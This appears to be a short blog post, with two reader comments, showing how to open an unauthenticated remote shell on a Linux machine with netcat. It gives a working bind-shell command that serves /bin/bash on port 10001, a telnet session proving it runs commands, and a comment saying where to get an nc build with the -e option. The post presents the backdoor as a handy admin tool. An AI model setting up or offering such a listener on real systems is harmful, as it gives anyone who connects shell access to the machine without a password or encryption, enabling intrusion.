Remote backdoor on Linux using ‘nc’

nc -l -e /bin/bash -p 10001

Not much to explain here. -l listens for incoming connections, -e executes /bin/bash when you connect, and -p chooses the port to listen on.

You must use a semicolon after each command.

[email protected]:~$ telnet localhost 10001
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
whoami;
will

There you go. Obviously this has the potential for misuse; running this as root will create a remote backdoor after all. But it’s also a very useful administrative tool. Keep in mind that nc is not encrypted in any way, and anyone could use this to connect.

nc terminates after you exit your connection, and only one person can be connected at once.

2 Responses to “Remote backdoor on Linux using ‘nc’”

  1. ardnew says:

    From my experience, the nc build most distros release disable the -e option

  2. termina says:

    Debian and Ubuntu don’t; I can’t imagine any good distro would. 🙂

    If your distro does, just grab nc from here: http://netcat.sourceforge.net/source.php?url=/download.php

Leave a Reply to termina Cancel reply

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.